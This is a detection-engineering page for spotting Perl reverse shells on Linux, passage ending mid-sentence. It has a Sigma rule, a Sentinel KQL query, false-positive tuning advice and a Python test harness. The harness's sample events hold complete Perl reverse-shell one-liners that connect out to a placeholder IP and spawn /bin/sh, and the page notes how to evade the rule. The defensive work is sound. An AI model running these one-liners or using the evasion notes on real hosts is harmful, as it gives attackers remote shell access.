Perl is installed on most Linux hosts, so adversaries who land on a system without their own tooling can use a Perl one-liner (perl -e '...') to open a reverse shell, giving them an interactive command and control channel for follow-on actions such as data exfiltration. SOC teams should hunt for this pattern in Linux process creation telemetry in Azure Sentinel so that the channel is identified and cut off early.
Detection Rule
title: Potential Perl Reverse Shell Execution
id: 259df6bc-003f-4306-9f54-4ff1a08fa38e
status: test
description: Detects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity
references:
    - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
    - https://www.revshells.com/
author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)'
date: 2023-04-07
tags:
    - attack.execution
logsource:
    category: process_creation
    product: linux
detection:
    selection_img:
        Image|endswith: '/perl'
        CommandLine|contains: ' -e '
    selection_content:
        - CommandLine|contains|all:
              - 'fdopen('
              - '::Socket::INET'
        - CommandLine|contains|all:
              - 'Socket'
              - 'connect'
              - 'open'
              - 'exec'
    condition: all of selection_*
falsepositives:
    - Unlikely
level: high
Azure Sentinel Query
imProcessCreate
| where TargetProcessName endswith "/perl"
    and TargetProcessCommandLine contains " -e "
    and (
        (TargetProcessCommandLine contains "fdopen(" and TargetProcessCommandLine contains "::Socket::INET")
        or (TargetProcessCommandLine contains "Socket" and TargetProcessCommandLine contains "connect"
            and TargetProcessCommandLine contains "open" and TargetProcessCommandLine contains "exec")
    )
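To check what the rule actually fires on before deploying the KQL version, the following is an added example (not part of the original page or the Sigma rule) that ports the two selections to plain Python and runs them over constructed process_creation events: a classic use Socket one-liner, the IO::Socket::INET/fdopen variant, a benign perl -e one-liner, a script executed from a file, and the same payload with -e glued to the code. All events, hosts and ports are made up for illustration.

```python
"""Added example (not from the original page or rule): a plain-Python port of
the Sigma selections above, run over constructed process_creation events."""

from typing import Dict, Iterable, List

Event = Dict[str, str]

# Constructed sample events for illustration only (no real telemetry).
# Field names follow the Sigma process_creation log source.
EVENTS: List[Event] = [
    {   # pentestmonkey-style one-liner: use Socket + connect + open + exec
        "id": "revshell_socket",
        "Image": "/usr/bin/perl",
        "CommandLine": (
            "perl -e 'use Socket;$i=\"10.0.0.1\";$p=4444;"
            "socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));"
            "if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");"
            "open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"
        ),
    },
    {   # IO::Socket::INET variant: caught by the fdopen( / ::Socket::INET branch
        "id": "revshell_iosocket",
        "Image": "/usr/bin/perl",
        "CommandLine": (
            "perl -e 'use IO::Socket::INET;"
            "$c=new IO::Socket::INET(PeerAddr,\"10.0.0.1:4444\");"
            "STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
        ),
    },
    {   # benign -e one-liner: has the flag, lacks every socket string
        "id": "benign_oneliner",
        "Image": "/usr/bin/perl",
        "CommandLine": "perl -e 'print \"hello\\n\"'",
    },
    {   # script run from a file (the false positive scenarios): no ' -e ' at all
        "id": "admin_report_script",
        "Image": "/usr/bin/perl",
        "CommandLine": "/usr/bin/perl /opt/admin_tools/report.pl --report",
    },
    {   # evasion: same payload, but -e glued to the code so ' -e ' never appears
        "id": "revshell_no_space",
        "Image": "/usr/bin/perl",
        "CommandLine": "perl -e'use Socket;connect(S,$a);open(STDIN,\">&S\");exec(\"/bin/sh\");'",
    },
]


def _contains_all(haystack: str, needles: Iterable[str]) -> bool:
    """Sigma 'contains|all': every needle present, case-insensitive (Sigma default)."""
    h = haystack.lower()
    return all(n.lower() in h for n in needles)


def matches_perl_reverse_shell(event: Event) -> bool:
    """Port of the rule: condition is 'all of selection_*'."""
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    # selection_img: the perl binary executing inline code via ' -e '
    if not (image.endswith("/perl") and " -e " in cmd.lower()):
        return False
    # selection_content: a YAML list means OR between the two contains|all blocks
    return (
        _contains_all(cmd, ["fdopen(", "::Socket::INET"])
        or _contains_all(cmd, ["Socket", "connect", "open", "exec"])
    )


def flag_events(events: Iterable[Event]) -> List[str]:
    """Return the ids of the events the rule would alert on, in input order."""
    return [e["id"] for e in events if matches_perl_reverse_shell(e)]


if __name__ == "__main__":
    for e in EVENTS:
        verdict = "ALERT" if matches_perl_reverse_shell(e) else "no match"
        print(f"{e['id']:>20}: {verdict}")
```

Only the two reverse shells are flagged. The script-from-file event never reaches the socket checks because it has no ' -e ', which is why the false positive scenarios below rarely need tuning at all. The last event shows the rule's main blind spot: perl accepts the code glued to the flag (-e'...') and also the -E flag, neither of which contains the literal ' -e ' the rule requires, so a hunt should pair this rule with a looser search for the socket strings alone.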
False Positive Scenarios
Every branch of the rule requires ' -e ' in the command line plus socket-related strings, so Perl scripts executed from a file, as in most of the scenarios below, do not match in the first place. Where a tuning is still needed, key the exclusion on something the attacker cannot trivially influence (a script path under a controlled directory, the parent process, the executing user) rather than on a flag such as --report, which any one-liner can carry as a decoy.
Scenario: Scheduled Perl Script for System Monitoring
Description: A legitimate scheduled job (for example a cron entry) runs a Perl script to monitor system performance or parse log files.
Filter/Exclusion: Exclude events whose CommandLine references a known script such as monitor_system.pl or log_parser.pl under its expected path, ideally combined with the scheduler as parent process.
Scenario: Admin Task to Generate Reports Using Perl
Description: An administrator uses a Perl script to generate reports from database queries or CSV files.
Filter/Exclusion: Exclude events whose CommandLine includes the --report or --output flags and whose script path is under a known admin tools directory (e.g., /opt/admin_tools/); the directory is the stronger anchor, the flags alone are trivially spoofed.
Scenario: Perl-Based Automation Tool Execution
Description: A known automation script built on Perl modules such as Net::SSH or DBI performs routine tasks like database backups or configuration syncs.
Filter/Exclusion: Exclude events whose CommandLine references the known script paths, e.g. /usr/local/bin/net_ssh.pl or /opt/dbi_utils/backup.pl, rather than the module names, which also appear in attacker one-liners.
Scenario: Perl Script for Log Parsing in SIEM Integration
Description: A Perl script parses logs and forwards them to a SIEM (e.g., Splunk, ELK); such forwarders do open sockets, so this is the scenario most likely to share strings with the rule.
Filter/Exclusion: Exclude events whose CommandLine includes --siem or --forward and whose script path is under the log processing directory (e.g., /var/log_processing/); the path condition must be present, not just the flags.
Scenario: Perl Script for User Account Management
Description: A Perl script is used to automate user account creation or modification via LDAP or Active Directory.
Filter/Exclusion: Exclude processes where the command_line includes --user or --ldap and the script is located in a user management